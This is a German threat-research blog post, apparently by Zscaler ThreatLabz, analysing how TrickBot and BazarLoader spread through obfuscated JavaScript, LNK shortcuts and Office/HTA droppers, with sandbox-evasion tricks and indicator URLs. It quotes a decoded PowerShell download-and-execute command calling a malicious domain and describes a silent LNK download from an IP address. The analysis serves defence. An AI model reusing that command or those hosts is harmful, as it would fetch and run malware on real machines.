Neue TrickBot- und BazarLoader-Kampagnen nutzen mehrere Übertragungsvektoren

Das Forschungsteam von Zscaler ThreatLabz überwacht täglich Tausende von Dateien, die neue und häufigste Bedrohungen verfolgen, einschließlich eines der bekanntesten Banktrojaner der letzten fünf Jahre: TrickBot. TrickBot ist seit 2016 aktiv und steht in Verbindung mit einer Vielzahl bösartiger Kampagnen, die Bitcoin-Mining und den Diebstahl von Bankdaten, persönlichen Identifikationsdaten und Zugangsdaten beinhalten. BazarLoader ist ein Spinoff dieses Trojaners, der von denselben Betreibern entwickelt wurde. Beide sind besonders gefährlich, da sie leicht modifizierbar und in der Lage sind, mehrstufige Payloads zu transportieren und Computer vollständig zu übernehmen.

ThreatLabz hat entdeckt, dass TrickBot-Betreiber in ihren jüngsten Angriffskampagnen neue Methoden zur Übermittlung von Payloads verwenden. Die von uns analysierten Malware-Proben waren gut durchdacht und in hohem Maße verschleiert, sodass die Sandbox umgangen werden konnte. In diesem Blog-Beitrag nehmen wir eine Analyse der verschiedenen von TrickBot und BazarLoader verwendeten Übertragungsvektoren vor.

Wichtige Punkte:

1. Script- und LNK-Dateien fügten Ausweichtechniken hinzu, um Malware-Bedrohungen umzusetzen.

2. Mehrschichtige Verschleierung wird verwendet, um die Analyse von JS- und LNK-Dateien auszuschließen.

3. Ein Office-Anhang legt eine HTA-Datei mit Snippets von HTML- und Javascript-Funktionen ab.

4. Neu registrierte Domänen werden zur Verbreitung von Bedrohungen genutzt.

TrickBot erweitert seine Dateitypen für die Verbreitung von Malware

In früheren Kampagnen wurden TrickBot-Payloads in der Regel als schädliche Anhänge an Microsoft Office-Dateien versendet. Im letzten Monat haben wir festgestellt, dass Malware auch ein hohes Volumen von Javascript-Dateien sowie eine Reihe anderer Dateiformate verwendet hat, wie in den folgenden Diagrammen dargestellt:

 

Abb. 1: TrickBot in der Zscaler Cloud Sandbox blockiert

Abb. 2: BazarLoader in der Zscaler Cloud Sandbox blockiert

In diesem Blog untersuchen wir die Abfolge von Angriffsphasen für mehrere Übertragungsvektoren, einschließlich: 

• TrickBot verbreitet sich über Skriptdateien
• TrickBot verbreitet sich über LNK-Dateien
• BazarLoader verbreitet sich über Office-Anhänge

TrickBot verbreitet sich über Skriptdateien

Trickbot dringt über Spam-E-Mails ein, die bösartige Javascript-Anhänge enthalten, zum Beispiel:  

Abb. 3: Spam-E-Mail-Anhang

In diesem Fall verfügt die Javascript-Datei [5B606A5495A55F2BD8559778A620F21B] über drei Verschleierungsschichten, die hauptsächlich zum Ausblenden und Umgehen von Sandbox-Umgebungen verwendet werden. Hier ein Snapshot der ersten verschleierten Schicht:

Abb. 4: Erste Verschleierungsschicht in Javascript

Die Malware-Betreiber haben nicht nur extreme Anstrengungen unternommen, um Javascript-Dateien stark zu verschleiern, sondern auch große Mengen an Junk-Code am Ende hinzugefügt, um die Fehlersuche zu erschweren. Der Junk-Code besteht nur aus zufällig generierten verschleierten Zeichenfolgen, die nichts mit dem Schadcode zu tun haben.

Abb. 5: Junk-Code, der die Analyse erschwert

Mithilfe der Funktion eval() haben wir die zweite Schicht, in die Schadcode und noch mehr Junk-Code eingebettet ist, aufgedeckt. Nach dem Entfernen dieser Junk-Code-Schicht wird die Funktion eval() noch einmal verwendet, um die letzte Code-Schicht abzurufen. Wir können sehen, dass die TrickBot-Betreiber die Methode setTimeout() verwendet haben, die einen Ausdruck nach 967 Millisekunden auswertet, um die Ausführung in der Sandbox zu verzögern. Dies hilft der Malware, Sandbox-Umgebungen zu umgehen.

Abb. 6: Zweite Verschleierungsschicht in Javascript

Im obigen Snapshot können wir sehen, wie die Methode replace im Code implementiert ist, bei der die Zeichenfolgen „hdBDJ“ und „tSJVh“ aus den Variablen „YHPhEFtKjqbCmAZ“ bzw. „kVYJOrLSqvdAWnaGTX“ entfernt werden, um die endgültige Zeichenfolge zu erhalten.

Abb. 7: Letzte Schicht

Das bösartige Javascript führt cmd.exe als untergeordneten Prozess aus, woraufhin cmd.exe powershell.exe ausführt, um TrickBot als Payload herunterzuladen. 

Ausführungsabfolge: 

Wscript.exe -> cmd.exe -> powershell.exe

Powershell.exe ist mit einem base64-kodierten Befehl eingebettet und nach der Dekodierung lautet der folgende Befehl:

IEX (New-Object Net.Webclient).downloadstring(https://jolantagraban{.}pl/log/57843441668980/dll/assistant{.}php")

Abb. 8: Zscaler Cloud Sandbox-Erkennung von Javascript-Downloader

TrickBot verbreitet sich über LNK-Dateien

Windows LNK (LNK)-Erweiterungen werden von Usern in der Regel als Verknüpfungen angesehen und wir beobachten häufig, dass Cyberkriminelle LNK-Dateien nutzen, um bösartige Dateien wie TrickBot herunterzuladen. TrickBot blendet den Code im Argumentbereich im Eigenschaftenbereich der LNK-Datei aus. Der Betreiber der Malware fügte zusätzliche Leerzeichen zwischen dem bösartigen Code ein, um Forschern das Debuggen des Codes zu erschweren. Wir haben die Nutzung dieser Technik bereits in der Emotet-Kampagne 2018 anhand von bösartigen Office-Anhängen gesehen.

Abb. 9: In den Eigenschaftenbereich von LNK eingebetteter Code

TrickBot wird heruntergeladen:

1. LNK lädt die Datei von 45.148.121.227/images/readytunes.png mit einem stillen Argument herunter, so dass der User keine Fehlermeldung oder Fortschrittsanzeige sehen kann.
2. Nach dem Herunterladen speichert die Malware die Datei im Temp-Ordner unter dem Namen application1_form.pdf.
3. Schließlich wird die Datei von application1_form.pdf in support.exe umbenannt und ausgeführt. support.exe ist in diesem Fall TrickBot.

Abb. 10: Zscaler Cloud Sandbox-Erkennung von LKN-Downloader

BazarLoader verbreitet sich über Office-Anhänge

Dies ist eine der anderen Techniken, die in TA551 APT, auch bekannt als Shathak, verwendet werden. Schädliche Office-Dokumente legen die HTA-Datei auf „C\ProgramData\sda.HTA“ ab. Diese HTA-Datei enthält HTML und vbscript, um eine bösartige DLL abzurufen und einen anfälligen Windows-Host mit BazarLoader zu infizieren. 

Sobald das Makro aktiviert ist, wird der Prozess mshta.exe ausgeführt, um ein Payload herunterzuladen. Diese Kampagne hat in der Vergangenheit bereits BazarLoader und TrickBot verbreitet.

Abb. 11: Abfolge von Angriffsphasen der DOC-Datei zum Herunterladen von BazarLoader

Base64-kodierte Daten werden in den HTML <div>-Tag implementiert, der später mit Javascript verwendet wird.

Abb. 12: Abgelegte HTA-Datei: Bösartige base64-Kodierung unter HTML <div>-Abschnitt

Nachfolgend ein Snapshot dekodierter base64-Daten, in denen wir sehen können, wie das Payload heruntergeladen und als „friendIFriend.jpg“-Datei auf dem Computer des Opfers gespeichert wird:

Abb. 13: Abgelegte HTA-Datei: Dekodierte base64-Daten

Netzwerk: C&C zum Herunterladen von BazarLoader

Abb. 14: Senden der Anfrage zum Herunterladen von BazarLoader

Wir haben auch neu registrierte Domains (NRDs) beobachtet, die speziell für die Verbreitung dieser Payloads erstellt wurden. Dabei wurde ein Stealer verwendet, der über Spam-E-Mails zugestellt und mit einem bösartigen Microsoft Office-Anhang gebündelt wurde.

Abb. 15: Neu registrierte Domain

Abb. 16: Zscaler Cloud Sandbox-Erkennung von bösartigem Office Datei-Downloader

JS.Downloader.Trickbot

Win32.Backdoor.BazarLoader

VBA.Downloader.BazarLoader

MITRE ATT&CK

 

 

Gefährdungsindikatoren

 

 

 

Zugehörige URLs:

jolantagraban.pl/log/57843441668980/dll/assistant.php

blomsterhuset-villaflora.dk/assistant.php

d15k2d11r6t6rl.cloudfront.net/public/users/beefree

C&C: